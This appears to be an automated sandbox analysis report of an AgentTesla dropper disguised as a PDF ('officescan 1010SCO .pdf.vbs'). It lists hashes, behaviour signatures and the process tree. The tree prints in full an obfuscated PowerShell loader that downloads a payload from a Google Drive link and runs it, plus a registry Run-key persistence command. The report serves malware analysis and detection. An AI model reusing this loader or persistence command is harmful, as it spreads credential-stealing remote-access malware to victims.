Analysis

  • max time kernel
    147s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    11-04-2024 02:13

General

  • Target

    officescan 1010SCO .pdf.vbs

  • Size

    272KB

  • MD5

    3dc581a23bc3d6115c76bc51cb512a53

  • SHA1

    6fa8254d8d81ebb9effc26b6617084dc0f97ae9f

  • SHA256

    457cda2f1a7e6a9082f3cfe7847a7d3937a5d7de90aefd06ebc5ed4f4255da49

  • SHA512

    fe3d49f400587275506eee35b7ee35e00eeb4fce28a1fc207aea7163fd5fb54a30e2290e08ed33ef04d5a06bb319f13e6ecbb3d97502d37fa88f28d7fa62e26e

  • SSDEEP

    6144:U5h1/GPWvV+kcuUxouBmfgbtosqFH8sBsnQAViKiDDCQbJPQf2/7cgU1bL5P08C:fmFb06

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\officescan 1010SCO .pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skudes = 1;$Slaveriers='Substrin';$Slaveriers+='g';Function Brudbjerget($Maneuvering){$Redne=$Maneuvering.Length-$Skudes;For($Hulemaleriernes75=5; $Hulemaleriernes75 -lt $Redne; $Hulemaleriernes75+=(6)){$Blackfishing+=$Maneuvering.$Slaveriers.Invoke($Hulemaleriernes75, $Skudes);}$Blackfishing;}function Erek($operationalised){. ($Acyanopsia) ($operationalised);}$Halvstik=Brudbjerget 'Al.diMCydonoAlde zse vfi soc lCompslAg.rsa Emer/ .tvb5.alan.Under0Anias Edema( Ran.W Empii.ardinSmlerd Han.o ChlowuppersJ,nos AutotNNgl.rTHvnge Vurde1 Rids0 Brne. Tren0 Te.p;Con,t BrontW Rumpi Recon Vejl6Jazzb4 Pins;Raast MustixInvec6 .ola4Cac l; M cr Mi rrR sikvCibar:Eudem1G,nan2 phot1avisk.siz l0D.cho)Enop, kodekGEdlaseStroocSpectkS,rpio myel/ Acto2Rodsk0Ambr.1Prfer0Atta,0Twigs1Pyton0 Tost1besee NeedFUntoniLodrer indueLege fAdnato Geotxexcid/ Meld1Po it2A.toc1Marro.Hj,ep0Aimab ';$Hoofmark=Brudbjerget ',iellUover,sPajameAdvokrFjort- CrenA InsugBrepoe bilyn AnfrtSamme ';$Hjemgivelses=Brudbjerget 'vandshKultut SocitAandfpSlagtsSoves:Beskr/Prem /Ins.mdRegger Incui ,osevKaleneSy.ed.Pa,vigKaffeoEikonoTai.bg ChinlImmore nwea.ForglcCombioNybormEkskl/.nfinuBesvrcSkipp? Aba eDyknixTampnphodm,oFagv,rVoldst mika=BlousdStyrkoPamirwStillnUnfaslFarveoCcidka.agebd uinq&Ade ti,ntiadEpiku= easy1 erlikPurl,MUpgroKMarkrLHftekiMisc.aNonav1Phono2EurotzRocks5Uplinw Dr ozLobby4Ha dh1.ellbhGu.naO Mill5acantWPi,tiL W,desEx.ctTKierkcSt rkmTraktdAcacipInd,raDepenqKond YU bil7concrTPhalaTK,dre5Refle ';$Unnearness=Brudbjerget 'Nocta>.ecim ';$Acyanopsia=Brudbjerget 'ReaktiBesmreRegnexsn ag ';$Whoppers = Brudbjerget 'umindeSteffcUnsenhSi,jnoAflvn Jernb%Unsyma BonipAdulapAmeridMet tadoornt rilaDryin%Oms.n\TalmsS.uperoFaldevDvrgfiAbscieTotr.tAlieniH.pomzOpgiviRe tan S.dagE.nri.,lkstPIberiaFrequlDiv,n Rel e&arvea&Stj r FantaeD sescForlbhXylanoPyrh. Gobii$Nedtr ';Erek (Brudbjerget 'Compl$nonfogDe islR.goro Ma,gbFagmeaBjergl Alum:U sdeAIsolanKe,lef PrajlCeresy U.sav Recon PaleiTrag.nUdsprg An,i=Curle(HypercUndermPerc,dRe ol Samme/CosetcCal.e Modul$ AloeWRves hPos.roKhis pLett pO,lageErs ar prusArcho)Densi ');Erek (Brudbjerget ' Er.t$ arokgBesejlUdsk o.onneb,bdigaIndfrlLangt:ThujiB BushlGrilloGrae mV mpls A.notKontreFor.prGub ehgalutaPhotonsnoghdMetrueGalvalMayfle StvsnL,ngbs Sem =Efter$NonsuHBiorhjE,ideeAlpinm syndgPoteniAttenvResmoeFoerslcentrsK ngeeSubclsove.r.ExequsOverep beamlAfgrdi nwattDisco(Af ar$SubpeU RecunB,llinIni ie SpleaGallirGravinTvin.eDekaes,olybscytoz)Op.ak ');$Hjemgivelses=$Blomsterhandelens[0];Erek (Brudbjerget 'Fort,$.ystegFireblEmulsozinkibLarynaAdhrel B de:H,freH ComeoStum.rcarnasBeckeeStadsju foroP.wercr ruskRete.eSviney Zegu= OverN,itteefornawRideb-r.segOunderbBrugtjMulkteMathfcAn.ietZoosp Un.lSSe igyVerdes SonotBoligeHydromOphng.NbicaNSnubseHegnetHje.m.PhilaWAerieeZimmebLivvaCSedgelElsk.iGr.eneuddatnBumbotMenta ');Erek (Brudbjerget ' ,vtn$ClaviHDesulo ByplrUs.ndsPollue arabjPersio,etjecGo,hikTutteeTomoty.inne. AlloH L,aneCantaaDissedUndecePanicrHastesKursn[Dihel$Fell HMeliao ProjoBeskifSkrmbm Subma LandrStummkMandr]Tab l=compr$ba vaHEfteraUn,omlLo.novConcosBijo t EntriLogark Fan. ');$festivals=Brudbjerget 'ForgaH adreoPreenrFlanksVandve SporjNin,toBlouscjovi.kQuipoe.oldayAvan .StrghDCosmoo P erwSchisnIssall D seoKarteaFjerndRygteF.opefi SmaalPer aeOverf(Divel$FangnH,ksemjSilkeeElectm .ompgPukkei Quitv SammeBeatel ubins.ompreTill.sBom,i, isol$excusLSejlmoTheavvFortrm BetyeGast dv.ndghLepido ,ubmlTvivldSstniiUppergImmun)Amicr ';$festivals=$Anflyvning[1]+$festivals;$Lovmedholdig=$Anflyvning[0];Erek (Brudbjerget 'Sauch$ CollgNon ulStim oHeltabZaffaaPdagol Iodi:AntenBAsbeslPageaeDri.kgD,smea BibenNonexs,aumniAfstag DagstW,nteePlexorre,rinProbleUnders Kont=Malad(CoxcoTla,tee,orresUndertSyl,i- vareP PinoaNacr tJuliehTouzl K.ind$ CamoLInvitoShottv OpkamToga.eAffi dTelefh oorooLingulOrthodDoorwiEgenagblokr) Urar ');while (!$Blegansigternes) {Erek (Brudbjerget 'Kithl$OutclgB litl Befuo rotob Txs,aJ,ckelEssay:Rn geORetu.vStudeeVrds.r Ety,bHegemeQersffInstioBusinlP,lerkudbryeSemirnErstadUnjuie Red sOscit=Capmi$RefortJoc orIdeliuNeuroe Ence ') ;Erek $festivals;Erek (Brudbjerget ' PrevSHjemftHodmaaCalvirr nertY,llc-ZootoSSus,elSinleeWatereEmblapUnlet Pro,r4gem.l ');Erek (Brudbjerget ' roml$ Reseg FortlB,omboM.nasb bou aMe,lblStile:OatyfBfourilIndskeUretegInddaaSemisnOverssF rnviLommeg Adi tAffileCypservillenScatteVe,onsOverd=Brav,(LauriTVer.eeKlatssBndertora.g- eillPForpaaBrunetCulothCombu kr f$songfLReflooFr.ttvAntikmWinteeAccladTilsah rovo .egtl Concd Vi.uiAfhjlgE kad)Grsro ') ;Erek (Brudbjerget 'Mecha$KlummgBad.ulUn bdoutricb JuicaBagerlTroml:DanskSUran,enog,erstrigvOrthoiRayahcEthe.e formm acceeFertidFor.aa BoilrTen,eb Fo.eetaknejVentid ibuteUnforrNonexe NicksTro,h= ndse$CardagDen.rlGeomeoNico,bRen,maP eudl Puff: ighjK SanduFierarK,nsusUdmrke Woodr OutleHarefdC tateAdfrdsCivil+Rekon+ hira%unbea$ AloeB.renzlAp,dio devimL.rrisFejlttBestieLas,prAnvenh BesiaG,necnHamskdAmanueImmorlPe tieBatwonTuni.s Sikk.B,ttecRhampoNavleuCentrn StymtPerac ') ;$Hjemgivelses=$Blomsterhandelens[$Servicemedarbejderes];}Erek (Brudbjerget 'Gymna$Slagtgapparl Galco JensbFunktaTroiklUd.av:Skv,lSF,rmaeB,stvd skina.rappnMacr.sHoved Djvle= ,nkn FrdigGStiere TermtCobri-ArchiC Am,uo noran StoltPo,tfeA,tonn aflet Lett Chalc$SkyskL .traoUntanvPigmemUnreseFllesd P,aih TotaoUdskrl.oncod U.mai Miamg Rech ');Erek (Brudbjerget 'Unpre$Ko.ligChrislAcidio Spi.b .yntaEgn tlMugg.: OutcKFejl,arouxsn StupaHurl,rRemaiifinerstegn,kFrequeBadeo Chatw=Shyes Ud.ik[TropsSRetteySeap.sFremvt DekleSkolem Nonv.DimitCFi.ssoExoasnForbev AnaleOversrBistatFitne]Gover:Hol,e:TerciFBanturCu stopaahamKontaB HvidaAdvoksa.plieRe.pi6Sekun4RotifS uelltS.ciarEtiopiSu,ernBonusg,kriv(Antag$ Ma sSAlsooeMeadodi,dloa,irkenRu ensLeges)Kommu ');Erek (Brudbjerget 'Forko$WhipbgOmhygl Ket.oOria bAd kiachecklPrfer:Be.kmIApsisdDes,oi Pasto mandlKbestoButtogClu biUrfolsBomstm Sky, Undia= Pike Malle[coqu,SFolkeyBilvrsAfgnatTrivseOver,mSla.i.Ct,niT Str.eBiovaxPo ittTrold.OutteE Bro.nIridicOlieboBranddRe,laiR ngmn Ing.gRep,o]Ag.le:Aliqu:Re klAMicr.SAxonoCUr.liIzygmuITakta.BekosGMa,see RutttSammeSOptimtTurber ,ecoiSlikpnCromsgHil e(Subas$BesttK Boc,aOversnSattea Be tr.altoi mangs GashkespageKoble)L.ter ');Erek (Brudbjerget 'pse d$TystngterpelBad lo eul,b silkaGauntlJern.:Tonosd SkreiGl,ttshickmtUn uti Chr nSerengGynecu Barui CirrsA.dlih iskee MatedFritul FrieyPregn=grebe$NoncoIS.miadPsykoiguisaoBringlP.puloBrak,gH.lpeiFyrigs Fastm Vikt.SoldrsambuluHoldfbvalutsEk dit FocarBogo.i ampen,hlorgSkipd( Afsk3 Omtr0 Inte7,nava3Bookb5T.tul0A.rfr,Gummi2Thro,7 D.ma5Svum 2 Soot3Sansc)Cente ');Erek $distinguishedly;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sovietizing.Pal && echo $"
        3⤵
          PID:2444
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skudes = 1;$Slaveriers='Substrin';$Slaveriers+='g';Function Brudbjerget($Maneuvering){$Redne=$Maneuvering.Length-$Skudes;For($Hulemaleriernes75=5; $Hulemaleriernes75 -lt $Redne; $Hulemaleriernes75+=(6)){$Blackfishing+=$Maneuvering.$Slaveriers.Invoke($Hulemaleriernes75, $Skudes);}$Blackfishing;}function Erek($operationalised){. ($Acyanopsia) ($operationalised);}$Halvstik=Brudbjerget 'Al.diMCydonoAlde zse vfi soc lCompslAg.rsa Emer/ .tvb5.alan.Under0Anias Edema( Ran.W Empii.ardinSmlerd Han.o ChlowuppersJ,nos AutotNNgl.rTHvnge Vurde1 Rids0 Brne. Tren0 Te.p;Con,t BrontW Rumpi Recon Vejl6Jazzb4 Pins;Raast MustixInvec6 .ola4Cac l; M cr Mi rrR sikvCibar:Eudem1G,nan2 phot1avisk.siz l0D.cho)Enop, kodekGEdlaseStroocSpectkS,rpio myel/ Acto2Rodsk0Ambr.1Prfer0Atta,0Twigs1Pyton0 Tost1besee NeedFUntoniLodrer indueLege fAdnato Geotxexcid/ Meld1Po it2A.toc1Marro.Hj,ep0Aimab ';$Hoofmark=Brudbjerget ',iellUover,sPajameAdvokrFjort- CrenA InsugBrepoe bilyn AnfrtSamme ';$Hjemgivelses=Brudbjerget 'vandshKultut SocitAandfpSlagtsSoves:Beskr/Prem /Ins.mdRegger Incui ,osevKaleneSy.ed.Pa,vigKaffeoEikonoTai.bg ChinlImmore nwea.ForglcCombioNybormEkskl/.nfinuBesvrcSkipp? Aba eDyknixTampnphodm,oFagv,rVoldst mika=BlousdStyrkoPamirwStillnUnfaslFarveoCcidka.agebd uinq&Ade ti,ntiadEpiku= easy1 erlikPurl,MUpgroKMarkrLHftekiMisc.aNonav1Phono2EurotzRocks5Uplinw Dr ozLobby4Ha dh1.ellbhGu.naO Mill5acantWPi,tiL W,desEx.ctTKierkcSt rkmTraktdAcacipInd,raDepenqKond YU bil7concrTPhalaTK,dre5Refle ';$Unnearness=Brudbjerget 'Nocta>.ecim ';$Acyanopsia=Brudbjerget 'ReaktiBesmreRegnexsn ag ';$Whoppers = Brudbjerget 'umindeSteffcUnsenhSi,jnoAflvn Jernb%Unsyma BonipAdulapAmeridMet tadoornt rilaDryin%Oms.n\TalmsS.uperoFaldevDvrgfiAbscieTotr.tAlieniH.pomzOpgiviRe tan S.dagE.nri.,lkstPIberiaFrequlDiv,n Rel e&arvea&Stj r FantaeD sescForlbhXylanoPyrh. Gobii$Nedtr ';Erek (Brudbjerget 'Compl$nonfogDe islR.goro Ma,gbFagmeaBjergl Alum:U sdeAIsolanKe,lef PrajlCeresy U.sav Recon PaleiTrag.nUdsprg An,i=Curle(HypercUndermPerc,dRe ol Samme/CosetcCal.e Modul$ AloeWRves hPos.roKhis pLett pO,lageErs ar prusArcho)Densi ');Erek (Brudbjerget ' Er.t$ arokgBesejlUdsk o.onneb,bdigaIndfrlLangt:ThujiB BushlGrilloGrae mV mpls A.notKontreFor.prGub ehgalutaPhotonsnoghdMetrueGalvalMayfle StvsnL,ngbs Sem =Efter$NonsuHBiorhjE,ideeAlpinm syndgPoteniAttenvResmoeFoerslcentrsK ngeeSubclsove.r.ExequsOverep beamlAfgrdi nwattDisco(Af ar$SubpeU RecunB,llinIni ie SpleaGallirGravinTvin.eDekaes,olybscytoz)Op.ak ');$Hjemgivelses=$Blomsterhandelens[0];Erek (Brudbjerget 'Fort,$.ystegFireblEmulsozinkibLarynaAdhrel B de:H,freH ComeoStum.rcarnasBeckeeStadsju foroP.wercr ruskRete.eSviney Zegu= OverN,itteefornawRideb-r.segOunderbBrugtjMulkteMathfcAn.ietZoosp Un.lSSe igyVerdes SonotBoligeHydromOphng.NbicaNSnubseHegnetHje.m.PhilaWAerieeZimmebLivvaCSedgelElsk.iGr.eneuddatnBumbotMenta ');Erek (Brudbjerget ' ,vtn$ClaviHDesulo ByplrUs.ndsPollue arabjPersio,etjecGo,hikTutteeTomoty.inne. AlloH L,aneCantaaDissedUndecePanicrHastesKursn[Dihel$Fell HMeliao ProjoBeskifSkrmbm Subma LandrStummkMandr]Tab l=compr$ba vaHEfteraUn,omlLo.novConcosBijo t EntriLogark Fan. ');$festivals=Brudbjerget 'ForgaH adreoPreenrFlanksVandve SporjNin,toBlouscjovi.kQuipoe.oldayAvan .StrghDCosmoo P erwSchisnIssall D seoKarteaFjerndRygteF.opefi SmaalPer aeOverf(Divel$FangnH,ksemjSilkeeElectm .ompgPukkei Quitv SammeBeatel ubins.ompreTill.sBom,i, isol$excusLSejlmoTheavvFortrm BetyeGast dv.ndghLepido ,ubmlTvivldSstniiUppergImmun)Amicr ';$festivals=$Anflyvning[1]+$festivals;$Lovmedholdig=$Anflyvning[0];Erek (Brudbjerget 'Sauch$ CollgNon ulStim oHeltabZaffaaPdagol Iodi:AntenBAsbeslPageaeDri.kgD,smea BibenNonexs,aumniAfstag DagstW,nteePlexorre,rinProbleUnders Kont=Malad(CoxcoTla,tee,orresUndertSyl,i- vareP PinoaNacr tJuliehTouzl K.ind$ CamoLInvitoShottv OpkamToga.eAffi dTelefh oorooLingulOrthodDoorwiEgenagblokr) Urar ');while (!$Blegansigternes) {Erek (Brudbjerget 'Kithl$OutclgB litl Befuo rotob Txs,aJ,ckelEssay:Rn geORetu.vStudeeVrds.r Ety,bHegemeQersffInstioBusinlP,lerkudbryeSemirnErstadUnjuie Red sOscit=Capmi$RefortJoc orIdeliuNeuroe Ence ') ;Erek $festivals;Erek (Brudbjerget ' PrevSHjemftHodmaaCalvirr nertY,llc-ZootoSSus,elSinleeWatereEmblapUnlet Pro,r4gem.l ');Erek (Brudbjerget ' roml$ Reseg FortlB,omboM.nasb bou aMe,lblStile:OatyfBfourilIndskeUretegInddaaSemisnOverssF rnviLommeg Adi tAffileCypservillenScatteVe,onsOverd=Brav,(LauriTVer.eeKlatssBndertora.g- eillPForpaaBrunetCulothCombu kr f$songfLReflooFr.ttvAntikmWinteeAccladTilsah rovo .egtl Concd Vi.uiAfhjlgE kad)Grsro ') ;Erek (Brudbjerget 'Mecha$KlummgBad.ulUn bdoutricb JuicaBagerlTroml:DanskSUran,enog,erstrigvOrthoiRayahcEthe.e formm acceeFertidFor.aa BoilrTen,eb Fo.eetaknejVentid ibuteUnforrNonexe NicksTro,h= ndse$CardagDen.rlGeomeoNico,bRen,maP eudl Puff: ighjK SanduFierarK,nsusUdmrke Woodr OutleHarefdC tateAdfrdsCivil+Rekon+ hira%unbea$ AloeB.renzlAp,dio devimL.rrisFejlttBestieLas,prAnvenh BesiaG,necnHamskdAmanueImmorlPe tieBatwonTuni.s Sikk.B,ttecRhampoNavleuCentrn StymtPerac ') ;$Hjemgivelses=$Blomsterhandelens[$Servicemedarbejderes];}Erek (Brudbjerget 'Gymna$Slagtgapparl Galco JensbFunktaTroiklUd.av:Skv,lSF,rmaeB,stvd skina.rappnMacr.sHoved Djvle= ,nkn FrdigGStiere TermtCobri-ArchiC Am,uo noran StoltPo,tfeA,tonn aflet Lett Chalc$SkyskL .traoUntanvPigmemUnreseFllesd P,aih TotaoUdskrl.oncod U.mai Miamg Rech ');Erek (Brudbjerget 'Unpre$Ko.ligChrislAcidio Spi.b .yntaEgn tlMugg.: OutcKFejl,arouxsn StupaHurl,rRemaiifinerstegn,kFrequeBadeo Chatw=Shyes Ud.ik[TropsSRetteySeap.sFremvt DekleSkolem Nonv.DimitCFi.ssoExoasnForbev AnaleOversrBistatFitne]Gover:Hol,e:TerciFBanturCu stopaahamKontaB HvidaAdvoksa.plieRe.pi6Sekun4RotifS uelltS.ciarEtiopiSu,ernBonusg,kriv(Antag$ Ma sSAlsooeMeadodi,dloa,irkenRu ensLeges)Kommu ');Erek (Brudbjerget 'Forko$WhipbgOmhygl Ket.oOria bAd kiachecklPrfer:Be.kmIApsisdDes,oi Pasto mandlKbestoButtogClu biUrfolsBomstm Sky, Undia= Pike Malle[coqu,SFolkeyBilvrsAfgnatTrivseOver,mSla.i.Ct,niT Str.eBiovaxPo ittTrold.OutteE Bro.nIridicOlieboBranddRe,laiR ngmn Ing.gRep,o]Ag.le:Aliqu:Re klAMicr.SAxonoCUr.liIzygmuITakta.BekosGMa,see RutttSammeSOptimtTurber ,ecoiSlikpnCromsgHil e(Subas$BesttK Boc,aOversnSattea Be tr.altoi mangs GashkespageKoble)L.ter ');Erek (Brudbjerget 'pse d$TystngterpelBad lo eul,b silkaGauntlJern.:Tonosd SkreiGl,ttshickmtUn uti Chr nSerengGynecu Barui CirrsA.dlih iskee MatedFritul FrieyPregn=grebe$NoncoIS.miadPsykoiguisaoBringlP.puloBrak,gH.lpeiFyrigs Fastm Vikt.SoldrsambuluHoldfbvalutsEk dit FocarBogo.i ampen,hlorgSkipd( Afsk3 Omtr0 Inte7,nava3Bookb5T.tul0A.rfr,Gummi2Thro,7 D.ma5Svum 2 Soot3Sansc)Cente ');Erek $distinguishedly;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sovietizing.Pal && echo $"
            4⤵
              PID:2768
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1040
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nne% -w 1 $Omkommendes=(Get-ItemProperty -Path 'HKCU:\auditable\').Slavehandels;%Nne% ($Omkommendes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1732
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Nne% -w 1 $Omkommendes=(Get-ItemProperty -Path 'HKCU:\auditable\').Slavehandels;%Nne% ($Omkommendes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:528

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        61601833012b09a882ff0e6953fdf794

        SHA1

        2d0f7e2ae2f6e9e0fbdd9cb81637f40ecb032d19

        SHA256

        c3e51283bf6493936e4e6571728ba21958601db56d2d1104eb9b51b3af558c07

        SHA512

        94b85166097bb237a2fd02f0c0183746dd38a2764b73577063dbf4c6f58e8037cd1ab5157e09b8d88edfe987931a1952c9cdc2b47ee4837f63a7fd7f5cd71a74

      • C:\Users\Admin\AppData\Local\Temp\CabE908.tmp

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9OGK01FQO949XLWZF69B.temp

        Filesize

        7KB

        MD5

        494f99a77c53aaa64d099b20e0300323

        SHA1

        d88489e7384d35af4acfdf97845cd14345427bcc

        SHA256

        a70175b3f6719ca5bcec3c91334e78cf0245fd3113cfb21e958c25df2bd3b776

        SHA512

        4635bf9cd02c9b93c4105a5ada8abc99b830305af11dae1ee6daaeab28995605b8b8fc321644d6eec48b36e5be71f54908deb0f0ec97f4029b6338db7f946f5a

      • C:\Users\Admin\AppData\Roaming\Sovietizing.Pal

        Filesize

        436KB

        MD5

        3045746324ee2895e4ca6ba163f7b5b5

        SHA1

        64f3c1c9cb198810350e44d5ad694220b92d6c0f

        SHA256

        b01382849c99c12b453707ae9f8b1a55f746f434ba05b3ce130878351520e434

        SHA512

        aad15fb2e1339eb55513f81d0e6b9993ea6fbf17402b390cf043b64d6de85276224af4bf96db085fb9ecb0f8996e78c24e4540445cf1a69846860598b3fb3977

      • memory/1040-86-0x00000000250F0000-0x0000000025130000-memory.dmp

        Filesize

        256KB

      • memory/1040-84-0x0000000000EE0000-0x0000000000F22000-memory.dmp

        Filesize

        264KB

      • memory/1040-81-0x00000000775D0000-0x00000000776A6000-memory.dmp

        Filesize

        856KB

      • memory/1040-85-0x000000006EEA0000-0x000000006F58E000-memory.dmp

        Filesize

        6.9MB

      • memory/1040-80-0x0000000000EE0000-0x0000000001F42000-memory.dmp

        Filesize

        16.4MB

      • memory/1040-53-0x00000000773E0000-0x0000000077589000-memory.dmp

        Filesize

        1.7MB

      • memory/1040-91-0x000000006EEA0000-0x000000006F58E000-memory.dmp

        Filesize

        6.9MB

      • memory/1040-56-0x0000000000EE0000-0x0000000001F42000-memory.dmp

        Filesize

        16.4MB

      • memory/1040-93-0x00000000250F0000-0x0000000025130000-memory.dmp

        Filesize

        256KB

      • memory/1040-55-0x00000000775D0000-0x00000000776A6000-memory.dmp

        Filesize

        856KB

      • memory/1040-54-0x0000000077606000-0x0000000077607000-memory.dmp

        Filesize

        4KB

      • memory/1604-34-0x0000000073280000-0x000000007382B000-memory.dmp

        Filesize

        5.7MB

      • memory/1604-46-0x0000000006430000-0x000000000BB49000-memory.dmp

        Filesize

        87.1MB

      • memory/1604-41-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

      • memory/1604-42-0x0000000005DF0000-0x0000000005EF0000-memory.dmp

        Filesize

        1024KB

      • memory/1604-43-0x0000000073280000-0x000000007382B000-memory.dmp

        Filesize

        5.7MB

      • memory/1604-44-0x0000000073280000-0x000000007382B000-memory.dmp

        Filesize

        5.7MB

      • memory/1604-45-0x0000000005130000-0x0000000005131000-memory.dmp

        Filesize

        4KB

      • memory/1604-35-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

      • memory/1604-47-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

      • memory/1604-50-0x0000000005DF0000-0x0000000005EF0000-memory.dmp

        Filesize

        1024KB

      • memory/1604-51-0x00000000773E0000-0x0000000077589000-memory.dmp

        Filesize

        1.7MB

      • memory/1604-52-0x00000000775D0000-0x00000000776A6000-memory.dmp

        Filesize

        856KB

      • memory/1604-82-0x0000000073280000-0x000000007382B000-memory.dmp

        Filesize

        5.7MB

      • memory/1604-32-0x0000000073280000-0x000000007382B000-memory.dmp

        Filesize

        5.7MB

      • memory/1604-33-0x00000000002D0000-0x0000000000310000-memory.dmp

        Filesize

        256KB

      • memory/2664-38-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-21-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2664-37-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-40-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-27-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-39-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-83-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-26-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-25-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-24-0x0000000002920000-0x00000000029A0000-memory.dmp

        Filesize

        512KB

      • memory/2664-23-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

        Filesize

        9.6MB

      • memory/2664-22-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

        Filesize

        32KB